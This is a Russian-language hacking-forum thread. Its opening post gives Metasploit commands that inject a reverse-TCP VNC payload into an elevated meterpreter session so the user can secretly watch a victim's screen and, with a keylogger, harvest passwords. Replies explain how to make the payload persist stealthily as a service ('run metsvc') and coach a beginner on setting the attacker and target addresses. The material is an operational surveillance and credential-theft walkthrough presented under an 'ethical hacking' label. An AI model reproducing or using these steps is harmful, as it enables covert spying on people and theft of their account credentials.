HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.09.2016, 15:41
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,



(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

> use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit




Убеждаемся, что все идет успешно:



В результате этих действий будет открыто окно VNC – сервера:



На этом все, вопросы и пожелания жду в комментариях.
 
Ответить с цитированием

  #2  
Старый 07.09.2016, 19:38
z3RoTooL
Новичок
Регистрация: 29.02.2016
Сообщений: 0
С нами: 5370865

Репутация: 0
По умолчанию

збс, лес как у меня на обоях
 
Ответить с цитированием

  #3  
Старый 07.09.2016, 23:01
z3RoTooL
Новичок
Регистрация: 29.02.2016
Сообщений: 0
С нами: 5370865

Репутация: 0
По умолчанию

Цитата:

IronBird сказал(а):

Так может это и твой стол?)

точно спалился
 
Ответить с цитированием

  #4  
Старый 23.09.2016, 07:59
Сергей Попов
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами: 5656404

Репутация: 0
По умолчанию

Цитата:

Алёша сказал(а):

кто нибудь знает как беспалевно вживить payload на постоянно?

Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
 
Ответить с цитированием

  #5  
Старый 01.10.2016, 20:53
Triton
Новичок
Регистрация: 30.09.2016
Сообщений: 0
С нами: 5061452

Репутация: 0
По умолчанию

Цитата:

Алёша сказал(а):

кто нибудь знает как беспалевно вживить payload на постоянно?

В отрытой сессии пейлоада:
Цитата:

run metsvc

Пропишет нагрузку как сервис.
Справка:
Цитата:

OPTIONS:

-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)

 
Ответить с цитированием

  #6  
Старый 25.03.2017, 11:31
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

OmeN сказал(а):

я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
Это надо вводить в msf консоль
сначало msfconsole запускаем.
 
Ответить с цитированием

  #7  
Старый 26.03.2017, 09:04
asshole
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами: 4808708

Репутация: 0
По умолчанию

Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
 
Ответить с цитированием

  #8  
Старый 26.03.2017, 09:35
asshole
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами: 4808708

Репутация: 0
По умолчанию

Цитата:

DSW сказал(а):

set LHOSTip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1

Какая команда указывает жертву?
 
Ответить с цитированием

  #9  
Старый 26.03.2017, 10:14
asshole
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами: 4808708

Репутация: 0
По умолчанию

Цитата:

DSW сказал(а):

Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем

Спс. Ip серый или белый?
 
Ответить с цитированием

  #10  
Старый 01.04.2017, 20:20
Chena
Новичок
Регистрация: 13.03.2017
Сообщений: 0
С нами: 4825198

Репутация: 0
По умолчанию

Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.